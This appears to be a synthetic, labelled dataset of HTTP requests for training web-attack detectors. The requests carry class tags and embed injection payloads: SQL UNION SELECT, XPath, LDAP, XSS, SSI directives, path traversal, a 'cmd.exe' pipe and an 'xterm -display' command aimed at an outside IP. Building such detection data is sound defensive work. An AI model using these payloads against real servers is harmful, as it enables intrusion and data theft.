GET /ea7o6y4nWlJHtw6y/Btpo7CtmprmiEhMk76/dNbinputlsAsH_BL/mochaDGqpwindow.open/lhsn.asp?updateGorkimg0img1=tgez7telhto9&htpass8dOl=0tecnlibmn%3Es3&fHr1aLfttj9=+eemik&hmg=mr-rssiesafayevbscriptNect&2iobemzlromiono=1&FRRtRJ4I=at+&nGhfzs=yd7oznpez&Mt4roth=1668989&5dmoedf=.%2F..%2F..%2F..%2F..%2F..%2F&rxeont=62619&duAw0ydl7X=a3ritcvwdr&e05maaweato6=laef&mno4sexleicogne=2240&dtreeida4ea=g8z-1D1wS HTTP/1.1
Host: www.ckya2tClkg.fr
Connection: close
Accept: */*
Accept-Charset: euc-kr;q=0.0
Accept-Encoding: gzip;q=0.5
Accept-Language: nti6im-ehaud
Cache-Control: hr=aa
Client-ip: 66.66.94.9
Cookie: xSaanohherrct=2;9noctztmaL=e6-o;HoD8andtB=3;th=rnc;sMiP6BDsSL=eMt
Cookie2: $Version="8"
Date: Mon, 04 Jul 05 13:33:27 UTC
ETag: "5dTB3_gAXG5Nx4RIfSTO"
Expect: 100-continue
From: srwYoiR5@1klnww.fr
If-Modified-Since: Sat, 28 Apr 07 10:41:19 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: "smgY2HBXv1S8bJS1NRj"
If-None-Match: *
If-Range: Mon, 13 Jul 09 12:38:18 UTC
Max-Forwards: 360
MIME-Version: 7.4
Pragma: ft=gmhdOlv
Proxy-Authorization: onlbd lq3no=7uhTO
Authorization: Basic c2FpYTptdGExUmxv
Range: -83
Referer: http://Shetae.org/nlfatcYs.gif
TE: trailers,deflate,gzip
Trailer: Pragma
User-Agent: wtIoeltwe
UA-CPU: x86
UA-Disp: 5653,4264,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5717x165
Via: 0.6 www.0p2c.js:9182, 6.5 www.E3t5ris.jpg, emlc/4.4 www.egey.css
Transfer-Encoding: ncqru; klDi=mthma
Upgrade: nraObn/3.7
Warning: 306 www.lawl.shtml "aurdPlier1ephtrtem2m" "Sun, 15 Feb 04 16:47:27 UTC"
X-Forwarded-For: 122.93.208.190
X-Serial-Number: 42053074878
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44803
Start - Id: 49216
class: XPathInjection
GET /hR/c.-Hz1v.PCaNqgLzA9dS/libuctCxtRQGJQ4.htm?cWra=aAAi&ru=8&ceitIieadR=%24rstsei9&ddltmc0rbsw=S%401eciij%3DbodyoiAsrcvar%2Fwl&6epna=25373578&ropenacceptLS9rmwxmlNZ=etemiaPu50ke&7qwcvkeK=hsnnornxmpdej&ysoTtIfn8hu=aowtnhnmha1n7spse&2doibeqeeli=tvwp-tnumochaoehetc%7Cto&iieL=+mail-&it869MUxp=ftUosx%2Fcsdsit%2Fnhgdd6%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D+or+%27Dynden%27+++%3D++++%27&jhnid=rjkzmn&soRtleeEc2pize=bW4T&npaqt=necwn&net=1774442 HTTP/1.0
Host: www.isegepcan.net
Connection: keep-alive
Accept: image/*, audio/*
Accept-Charset: iso-8859-6, iso-8859-8-i
Accept-Encoding: gzip, deflate
Accept-Language: *
Cache-Control: no-cache
Client-ip: 105.50.230.232
Cookie: Gestset=5;y1yresflnnisnQ=514;tzbottad1AsOOfr=iHhUweei;diirde0e6E=sp\t;sribislarsi5mm=d catd0N;sSEvaeetl=Idhefle
Cookie2: $Version="19"
Date: Fri, 29 Aug 08 01:15:47 UTC
ETag: W/"PMFtKm7M45ftXYT2iM8i"
Expect: h28tt
From: lCae@ni91.be
If-Modified-Since: Fri, 23 Jan 04 17:16:33 UTC
If-Unmodified-Since: Thu, 08 Dec 05 18:15:47 UTC
If-Match: *
If-None-Match: "oMgVJMZ8dtgAJxGiifb"
If-Range: Thu, 08 May 08 14:14:29 CET
Max-Forwards: 32
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: negtt esueab=hroeocn
Range: -392691
Referer: /uehpYAn/Ffmrao/mumidSNu.tar.gz
TE: gzip;q=0.4,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/3.3 (X11; U; SunOS sun4u 2.2; 8e-Sr; rv:8.9.0) Gecko/08393915
UA-CPU: 68000
UA-Disp: 2354,727,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6245x946
Via: 5.2 www.om0oi.jpg, FTP/1.7 www.kioa.js, HTTP/4.0 www.me2lr.tiff
Transfer-Encoding: deflate
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 724 17.92.63.205 "uiDhIxbYiobgTemr" "Thu, 31 Jul 08 08:16:12 CET"
X-Forwarded-For: 104.165.218.9
X-Serial-Number: 094897870
----: ------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49216
Start - Id: 36647
class: OsCommanding
PUT /4hueuLdryenjT/k2pw8edieuoem/sGDiQLeWqpmDf/uE@iTViI5c1LosV/6uNRDle/E1.jpg? HTTP/1.0
Content-Length: 254
Content-Language: tneeeudw,amforZ
Content-Encoding: deflate
Content-Location: /yxvd/7reger/smSdr/rohtm.bin
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Apr 05 08:18:07 CET
Last-Modified: Fri, 15 Oct 04 04:37:52 UTC
Host: 41.240.180.77
Connection: ovldte
Accept: audio/basic;q=0.6, audio/basic;q=0.8, application/postscript;q=0.1
Accept-Charset: iso-8859-8;q=0.1
Accept-Encoding: identity;q=0.0
Accept-Language: *
Cache-Control: max-stale
Cookie2: $Version="775"
Date: Sun, 02 Jul 06 21:56:18 CET
ETag: "LWyNH-1tT2hT4oPF"
If-Modified-Since: Sun, 25 Mar 07 15:09:51 CET
If-Unmodified-Since: Thu, 08 Apr 10 04:04:26 GMT
If-Match: *
If-None-Match: "tvJu4o@X7_TKt6U"
Authorization: Digest nc=BcCC4BAB
Referer: /tdidg/lIepe/Qlnnn.gz
User-Agent: Mozilla/2.9 (Windows; U; Win98 3.1; hR-it; rv:6.8.2) Gecko/76561918
UA-CPU: StrongARM
UA-Pixels: 782x498
Via: 1.9 93.236.226.84
Transfer-Encoding: identity
X-Forwarded-For: 24.190.144.96

uarhtItdi4f=eaEa6rhbodyac1at&r8ei=polikeinput3&3suLgroup by=03&rHporldetfrlcp=natli:p&eikeNntTsmf=ahome&ntywaba3lamueoe=e~e&jeca6ahtrjhly=oRhYqK&geuOleoiZ=84953&lqiUQeeosoaa=91.113.40.228   |    cmd.exe /s&t4c=>arxa&tIdeeuht7oMmd=tcanuorckEattp

End - Id: 36647
Start - Id: 41771
class: SqlInjection
GET /xjnbX@GaUAxT/oesyynnonix/ZDdstdin97B/ksawat_5_.mspx?rwaob6iebed3bni=f%29c%5CiWlnmooo&1loiiepobAenti=tLXSe2rqzL&ohbhNynnoao51=175&1eaes=%27++++%29++++UNION+++++ALL++++SELECT+++5+++FROM++IUmbcgie++++WHERE+%28+++%27%27++%3D+%27&a7etcVbPs=rG-X1&T_kaR=yoomyite6nmo&iiJR9wZyEzT=+e%24 HTTP/1.0
Host: 54.32.39.8
Connection: Eesun
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale=50
Client-ip: 141.135.3.12
Cookie: 2buSlhoiowjh=8709;EoSgaiesA0ciu=inahiiglsf0s;bunotttN=629;dasnlutea=l9Eugnetcatbgsounds+;YNyf=20890102
Cookie2: $Version="86"
Date: Wed, 02 Aug 06 17:30:45 GMT
ETag: "Sd60XM.NsDcpTEMyeIVx"
Expect: osevnd
From: edbsae7@m3iuOei.biz
If-Modified-Since: Thu, 30 Jul 09 08:38:33 GMT
If-Unmodified-Since: Fri, 29 Jun 07 20:14:16 CET
If-Match: *
If-None-Match: "1jcCyg7mmJJYtY2.u-"
If-Range: *
Max-Forwards: 3
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Basic eFN3ZXlpczp0ZWVybXRi
Authorization: NTLM bDZxZXdoeTV3NmRlYXNtZXNoZXJ1eWRlNmFsZGFodDVsbHR5Yg==
Range: 4234-490888,-164882
Referer: http://etDnk.net/eaqoe/isezUnl/otceW38/i8tlahl.dll
TE: chunked;q=0.9
Trailer: Upgrade
User-Agent: ai8aqs
UA-CPU: 68000
UA-Disp: 740,6527,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 5624x146
Via: 5.5 www.6rsp7e.css, 3.0 144.140.49.88, 0.9 208.254.33.86
Transfer-Encoding: compress
Upgrade: baE/8.7, 0es9t/8.9, lisu/3.1, ncnHe/5.8, iuj/3.3
Warning: 047 www.s7aieai.js "nisluLPLAsoy" "Fri, 29 Jun 07 15:53:33 GMT"
X-Forwarded-For: 126.254.87.29
X-Serial-Number: 79451842006720281
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41771
Start - Id: 38360
class: LdapInjection
GET /la/eeeltlyuncae5rzttct/rqoroEyytEkeee/Nai9iaihOottHoi/a4/wQ4x@qiAZMAY-/ieartig0Hoi6o.exe?9stylecllogpUoWBY=89948&5idatncmeeEepNq=24&L1csFJUYh85Q=leeee&sm=ec&7MyB7U9-include=ce&iydeurdxe=%29+%28%7C%28cn%3D*o%27brien*++%29%28mail++%3D*o++%27brien*+++%29 HTTP/1.0
Host: 27.58.3.189
Connection: prEent
Accept: image/png;q=0.6, text/html;q=0.4
Accept-Charset: windows-1255;q=0.4
Accept-Encoding: identity, identity;q=0.3, gzip;q=0.5
Accept-Language: ees-dFoThto;q=0.2, oa4u1ss-t;q=0.1, wyahird-o, j3dpori-o5osnsu
Cache-Control: max-stale
Client-ip: 193.201.183.61
Cookie: eo=andrslc
Cookie2: $Version="245"
Date: Sat, 19 May 07 19:43:35 CET
ETag: W/"5LoC-V6hl1TUEpQHFV"
Expect: 100-continue
From: sss8tel@Dttyhoedag.be
If-Modified-Since: Tue, 18 Aug 09 02:15:53 UTC
If-Unmodified-Since: Fri, 18 Apr 08 01:15:49 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Nov 09 13:30:11 CET
Max-Forwards: 6
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="epfYqHet"
Authorization: lrietr canR=dtga
Range: 84-89,256260-35,5-
Referer: http://www.ir8w.cz/sitnli/eeeesAty/ewteop.pdf
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.1 (Windows; U; WinNT 7.5; dS-xb; rv:4.0.9) Gecko/83718165
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 231x314
Via: 7.2 115.92.196.7:1, 6.5 www.earnczr4.html
Transfer-Encoding: compress
Upgrade: Mso/2.1, 5stNn/1.9, etusna/2.9, fettee/0.9, 7agirn/3.3
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 9579642646846
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38360
Start - Id: 48311
class: XPathInjection
GET /heshoeledaeO.cgi? HTTP/1.1
Host: 130.208.137.197:31340
Connection: keep-alive
Accept: application/postscript, application/x-tar, video/quicktime;q=0.5
Accept-Charset: *
Accept-Encoding: lr'  or count(    path/child::node()[position( )=(( i    +    j    +k +   l +   1)]    |   path/child::*()[position()=(k+1)])=1  or 'ip'  = '  ghbtyn'  or
Accept-Language: *;q=0.8
Cache-Control: max-age=76594
Client-ip: 160.149.221.171
Cookie: 7hco=66106309;er=31469071;9@udr-B-GAUhaving=r8w;cNh4ToS=xzOn;ijHunawj1sgunhn=7433
Cookie2: $Version="77"
Date: Sat, 18 Sep 04 14:34:57 UTC
ETag: "5iy6r8NdIpbUNk@VBE"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 07:01:52 GMT
If-Unmodified-Since: Tue, 27 Dec 05 19:44:27 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 20 Jul 05 21:15:21 CET
Max-Forwards: 6
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM c0RsYWRuc3RkOGl0dmFsc2VhblRJc2hlYXZnVGtoZmVtZWdhYg==
Referer: /sogeeh/y8hntb/o5nsnke.png
TE: deflate
Trailer: Proxy-Authorization
User-Agent: ooApSpz2 (r9njhlNrOS; u.npRNqRUI; eG@5wlhPmC; aTAcWeWei)
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: 5.1 www.cgDcrq.htm, FTP/1.1 51.255.105.88
Transfer-Encoding: deflate
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 413 www.Cr8n.js "i4qiee7ebn" "Thu, 05 Aug 04 06:10:01 UTC"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48311
Start - Id: 37115
class: LdapInjection
GET /otTtj/tFr-wf@cyM/pbmbptcte/iJ/hjP.08q_m3A4F/fkj1stdinCg9/f5nn1/ovKrg7y@7RB.shtml?mamT=%29+%28%7C+++%28++++cn%3D*o+++%27brien*++%29%28mail%3D*o+++%27brien*++++%29++ HTTP/1.1
Host: 15.220.119.240:80
Connection: tseehe
Accept: application/*, video/quicktime;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: nziss2-Entueine;q=0.7, 2ie-ajiAeq;q=0.9, ytzo-a;q=0.3
Cache-Control: max-stale
Client-ip: 116.227.6.28
Cookie: Ya8ilnt9izeveta=ex-deT1;heT=2709;oiio8soeianEnw=oa&8ao
Cookie2: $Version="99"
Date: Mon, 21 May 07 21:48:13 CET
ETag: W/"1hm2z.hSMJ2UX6BV@"
Expect: 100-continue
From: ke6iat@otEmem.org
If-Modified-Since: Fri, 23 Oct 09 07:35:45 CET
If-Unmodified-Since: Sat, 09 Sep 06 05:44:22 UTC
If-Match: "nfYHp9hhfpwpGjAUoDG"
If-None-Match: "YaYrghb5gmtE5xvyi@P"
If-Range: "hSj..vl.bW0DN9X1qDQ8"
Max-Forwards: 56
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest cnonce="cvdipt"
Range: -12929,-403
Referer: http://www.asontseb.it/iviIuq/myse9rn.sh
TE: trailers
Trailer: Accept-Language
User-Agent: i1iNaznio/5.5.3.3
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 617x3755
Via: 0.1 231.16.188.166
Transfer-Encoding: compress
Upgrade: EenZu/2.8, Cisyi/4.3, airy/3.6, 5jWhoZ/5.7
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 4738976742686812
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37115
Start - Id: 49454
class: XPathInjection
GET /h.0P@5D3n-ml-wC2/tMTPcLH3Xwjos/fjOxhxJSwFqmE4ocGG/hgdtnitee3se/i4TL26xEtj/ehcwzZ246Vr18chpV/T@_7q8/oV/sPG/0EhAse.nsf?@U7bxr1yDopen57=33905121&m1ropt-Xincludekgfr=180632722&seiwsdmnaRjda9=q4z%27+++or++1%3C++eca%2Fne%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D0%5D+or++++%27ttw7rrsc%27++++%3D+%27&_fwzky=jinV HTTP/1.0
Host: www.enudoroa.cz
Connection: dI2ti5so
Accept: image/jpeg, image/jpeg, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: 0orin-xnatrn;q=0.7
Cache-Control: no-store
Client-ip: 241.130.105.59
Cookie: eandn=2
Cookie2: $Version="817"
Date: Wed, 21 Apr 04 03:37:52 CET
ETag: W/"kUU6QrCkb-GxGP.IGM"
Expect: 100-continue
From: n5thibdN@srSdAet.st
If-Modified-Since: Fri, 27 Feb 09 21:20:19 GMT
If-Unmodified-Since: Tue, 14 Dec 04 09:59:42 UTC
If-Match: "t1EbvlIreHl1-Qakk0hV"
If-None-Match: "Sb@O847m98Y6FOFIJT8"
If-Range: *
Max-Forwards: 078
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: rrse TEfia=s7duouae
Authorization: NTLM aG9hb3JuNnR4Z2JjYXRhaHd5ZDA4T2hlcnpxVFR0ZXI2aW5F
Range: -39079,-78,5246-2810
Referer: /jie4rhi/aemEeyf/hySn.css
TE: deflate,gzip,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/3.0 (X11; U; SunOS sun4u 8.2; oh-se; rv:6.0.8) Gecko/57993011
UA-CPU: PowerPC
UA-Disp: 247,139,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 546x4698
Via: 4.6 www.h82kioE.jpg
Transfer-Encoding: deflate
Upgrade: 7V1i5f/9.3
Warning: 806 44.0.29.60 "Kr4gdh25nfieofeas" 
X-Forwarded-For: 125.87.11.223
X-Serial-Number: 812184590933752195
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49454
Start - Id: 42308
class: SqlInjection
GET /style.BdeletebE9QH/m0k/epyxe0iem6mtaenbacn/raOttJFGnku9Zz/MxdCJ7/iwu1hd/fmhuc2@z4N/yKe-LLgltedP8prno.css?abdn=%27+AND+++++USER_NAME%28%29%3D%27tet&OetimeaiaJn9ehh=tdrTi&KEL09=rr&kj2auw=TSe&wicoqa4=e9jf%40ehFy%40&n8e=ozkIq&liB_=or-ry+tmce%7Cmsincee HTTP/1.1
Host: www.be0tns.st
Connection: CxxC
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: Sf3lte-eom;q=0.6, n6asup-sbbs
Cache-Control: no-cache
Client-ip: 50.218.71.30
Cookie: 1st1tFdska=iiumesIe;nkedcaytni7a=ddadmin;Enro1f=5;ndimam4dubT=odabme cs;ccgj5t=e0v
Cookie2: $Version="871"
Date: Fri, 08 Feb 08 07:20:27 CET
ETag: "NrIBh7YV-x.@lBq@zb"
Expect: CvnWhl=7zspbg;7aCd=aesnex
From: ebsew@sn8ns6e.de
If-Modified-Since: Sat, 15 Jul 06 22:52:50 CET
If-Unmodified-Since: Mon, 17 Jan 05 15:48:45 GMT
If-Match: *
If-None-Match: "SLU@Ds83z2a8B-YtfJZ"
If-Range: Sat, 09 Aug 08 04:40:22 UTC
Max-Forwards: 5359
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic dHZhSWJjaTpucmVVdzk=
Range: -568889,-588214
Referer: http://www.nehg.com/nxfenmsd.gz
TE: deflate;q=0.8
Trailer: Accept-Encoding
User-Agent: rCw_dMk http://www.Reahe.fr
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4371x6437
Via: 4etce/4.8 www.edao3see.png
Transfer-Encoding: deflate
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42308
Start - Id: 47207
class: XSS
GET /a@_vWJXPdf5PL16@-cL/n8c/1eaucibrI.aspx?nctNasujtluqk=tqledoapyheea&itc=srxe1m3aeb&le=yPbobntfnrid8dwleF&disasSwx=hR7&si=%3Cdiv+onmouseover++++%3D%22++++%5Balert++++%28%27Usr5oytEni%27%29%3B%5D+++%22+%3E&9orlJe8Rh=9&lsvAL3sBDmj=466&I0gNdJI6lkK=iitaarszaedentaqYu&ocNea=tveiN&upjnnnaRi=696237&lhoaHmuutep=godLtacnon HTTP/1.0
Host: 105.215.29.88
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1251, iso-8859-7, x-mac-turkish;q=0.2, iso-2022-jp, x-mac-arabic;q=0.2
Accept-Encoding: *
Accept-Language: eaehm-doii, m-err;q=0.1
Cache-Control: min-fresh=9
Client-ip: 63.161.16.102
Cookie: hotkiEund3ss=8952;src4uheo=xn/passwd;mieEm=0I;e7Esiojretde=]ss;@tMin3AJ=rs'lsW5i~e=wp-[n-
Cookie2: $Version="8"
Date: Fri, 12 Mar 10 22:28:05 CET
ETag: "owjdohDQxUXpeBzPAh5"
Expect: 100-continue
From: sljrhob@lQr5hecoet.de
If-Modified-Since: Sun, 06 Sep 09 21:19:02 CET
If-Unmodified-Since: Sat, 26 Jan 08 08:25:07 GMT
If-Match: "zjam0N@.5UF1pCJ"
If-None-Match: *
If-Range: Fri, 01 Sep 06 04:30:02 GMT
Max-Forwards: 4253
MIME-Version: 1.7
Pragma: eL6='aS6hd'
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: NTLM c242dHJOdDVzYThpUmVtZ253THJzd2Rpb25oeWdoTm5ybQ==
Range: 8-,46-,-554862
Referer: /arlai/ugea/neL1ieqo/stoilcco.png
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: a3tms/5.1.4.8.8
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: 2.6 www.4geu.htm, 1.3 214.63.9.22
Transfer-Encoding: compress
Upgrade: urd/1.0
Warning: 923 www.oagu.tiff "eebol" 
X-Forwarded-For: 42.248.51.9
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47207
Start - Id: 40724
class: SSI
GET /hyGf9.yd/i52ysyDyo/0tanlLdtlorw/vzxp_vArp6pI5Be/ezeei/rel5ahg8tive/psmplitldtz.nsf?LCqbseh=9&edatenfkto=%40sede-nfn2rteem&.DdWQscriptb=nY3eaAymw&zxdaawt=edO&eaGrz=1PqZ&occl4jrd=rx&nn4ur0=sse&Dh2unoH=fwnwp-8%24s%40documentE&.phpCaS3bcopyexec=onM&8prnGs-7telnetHg=pteheeaGa8targd&wDwUBh_copynetcatrdocument=lRU&uo=69390848 HTTP/1.1
Host: 198.131.185.93
Connection: stPbmzl
Accept: */*
Accept-Charset: iso-8859-9;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 87.193.44.132
Cookie: h0=9;@.NFhEN2=5;g.3YZGClike=rmej(httpbn;nunswtz=attruneemu
Date: Mon, 12 Jan 04 01:59:45 GMT
Expect: oesE=cendi
If-Unmodified-Since: Sun, 18 Jul 04 04:40:39 GMT
Max-Forwards: 3
Pragma: roomagi=z
Proxy-Authorization: Basic U3VhY2lzb0U6aXdzbg==
Authorization: NTLM b2V5bm9vb3JlZWt3dUV1YWhobmhucmVlc21JZzNxZXJwc3loTFhuZWxmZzQ=
Referer: /iRl4a/vAnih/udir3d/Tsdet/OeorohDf.doc
User-Agent: <!--   #odbc    connect="taJ,eu9ico,elbks"        statement="select    *   from nyv"-->
UA-Pixels: 665x5598
Via: HTTP/2.6 114.248.35.202, 1.4 www.9aevF.css:9025
Transfer-Encoding: AcfgnC; arae=eols
Upgrade: tnhbcr/4.1, jltoS/5.7, hnntni/0.8, kjr8nt/5.2
Warning: 061 117.197.195.92 "w4cretoaprhCflkM" "Tue, 16 Oct 07 06:45:57 CET"
----: ---------------------

null

End - Id: 40724
Start - Id: 41747
class: SqlInjection
GET /e2slM7bJe1pAI7w/4me0fExH/UxS/eewsnmvhpli/lA_nF03/OqhrmbgsoundEautoexec-n/thilasiejEon1tnouee.html?vncohBwsEipt=4927&@accept9sock_streamN=fan&k@REBo4fibO=nbLswhWee%7Cs%24ss&anahniiaNlTrbih=55&npnses=%27++%29++++UNION++ALL+++SELECT++en7ha2++++%2C++++ldmrasli++%2C+++++iovsee2++++FROM+++++tclsaWc+++++WHERE+++++ee++NOT+++IN++++%28+++%27tax%27+++%29++AND+uEroohd++++NOT++IN++++%28+%279Dla4aiia%27++++%29++++AND++%27%27+%3D%27&wi4moegrjnn=45&grha=attnarid2dc&eryteT6teitafsd=aKB&io6eyh=hei0ayehd26%7E%7Eyinmaccepte&haoyedessealcfr=5oNlPg-H&dfnn=woa3ndt6ptehen&trkacousf=n8Rignocefmonn&siis5avebfn2=947 HTTP/1.1
Host: 46.179.76.246
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=66844
Client-ip: 141.207.49.218
Cookie: Wr=sFjquoP.zv;oeewhL54a=67242;YupdateIZHuubetween_ewK=231546;LpxV_EQ=lEb0Y@fFs0
Cookie2: $Version="873"
Date: Sat, 23 May 09 15:51:22 UTC
ETag: "UVxosaB2xCH2mpUKt0jR"
Expect: ih2Wcxj
From: lehFo@eioiwni.cz
If-Modified-Since: Thu, 23 Jun 05 17:50:39 CET
If-Unmodified-Since: Sun, 17 Dec 06 22:25:36 UTC
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: *
If-Range: Fri, 24 Mar 06 20:06:15 UTC
Max-Forwards: 68
MIME-Version: 8.7
Pragma: z='qteMeon'
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic MGFlbG9jOm90MTlpaA==
Range: -69404,-1
Referer: /sycW.jsp
TE: trailers
Trailer: TE
User-Agent: Mozilla/9.1 (compatible; anerhca; Linux i586; legqledlih; htliigfne)
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0666x357
Via: truans/0.5 www.aedhm.gif, 8.8 www.WafeAin.html:76873, HTTP/7.6 5.8.6.135
Transfer-Encoding: compress
Upgrade: mer/2.9, hitWop/2.4, vtjw/1.7, otte/3.2
Warning: 878 www.6sn3l.shtml "noyalXfnbpe" "Wed, 14 Sep 05 14:01:16 CET"
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41747
Start - Id: 35661
class: XPathInjection
GET /eC/JorlsSth8huZ0/cuegnu3qetw/ae-YgEN/mzWY_j-kDQvByYk9bpip/ez187CRo9qTmjyCT/5x7hH.uDLb/metaTzEtiduX7perlb/TyudaITilYn/iLRYTI.shtml?Sw5=str&hnsw=44238769&la0okieorecoptg=cXqiYDdBebP&SOAnnigcd=9727+or+++++1%3C+++tt%2FrHj%2Flb%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D2%5D+++++or+++++1460%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&eucshYV2j=mod4nservicesnt6access_log+silg+9&uwzpkr=3670&n3ntcnjUe=os&erinn=i7arh&e7ynt4npm=etrtgs&3VLexecM=6171&input1kA5J=tea9b2O&gAjri=satserrcpdbetweenu7mcan%26d HTTP/1.0
Host: www.bEoge.fr
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: gzip, deflate, gzip;q=0.9
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 49.99.18.179
Cookie: jewerdcKyy=u8 2aqf6Jy&=s
Cookie2: $Version="3"
Date: Mon, 07 Feb 05 08:57:59 UTC
ETag: "UDJxFP191jf5i2WY"
Expect: 100-continue
From: njsh@NrDrfrcud.com
If-Modified-Since: Fri, 07 Aug 09 13:29:05 CET
If-Unmodified-Since: Tue, 20 Nov 07 14:26:25 GMT
If-Match: "D7A_v3.3WyzcJu5ZdPIm"
If-None-Match: "aksz6pGr7ZDHKs.y5B"
If-Range: *
Max-Forwards: 75
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lqioen sfhmyhu=mzEei
Authorization: Digest cnonce="nrsd"
Range: -5103
Referer: http://www.Fq6p.de/5nmt/wfdr/sizT.bin
TE: chunked;q=0.4,chunked,trailers
Trailer: User-Agent
User-Agent: 8Si.AO http://www.ufatph7.biz
UA-CPU: Sparc
UA-Disp: 4216,933,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: HTTP/7.3 247.135.253.145, 8.0 102.62.189.6:4528, gtit/4.2 www.7uue.tiff:769
Transfer-Encoding: deflate
Upgrade: alcth4/9.0, omen/8.5
Warning: 673 36.123.188.80 "hcrIRotv8tetpAwee" 
X-Forwarded-For: 168.165.190.35
X-Serial-Number: 24734
----: -------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 35661
Start - Id: 43589
class: OsCommanding
GET /lvbscriptyeFRpH/meodtSeea/evW0cZza51F@ITl6d1Uy/l-i4/uJ3USTPcGK5F/uaq1paba.jsp?ay=233&7b9etth=%7EgDl&aeyc3ohAreti=0E%3A&weo6echtfnH=bMqip2P_VB_&e7sianhniosa5=%5Cr+++++xterm++-display+++97.188.139.179%3A0.0 HTTP/1.0
Host: www.eoieht9.st:149
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: u='mqwx'
Client-ip: 170.185.16.223
Cookie: HP6@xkZ=4754;UhiGC=bhpea utxy;SacsD7aaeumLiy5=nQV.gBZ;ed9gneyidsn=15525
Cookie2: $Version="9"
Date: Sat, 28 Nov 09 14:54:30 GMT
ETag: W/"hh0G20wS-CY1qfd"
Expect: gtmnl0e=x4oheja
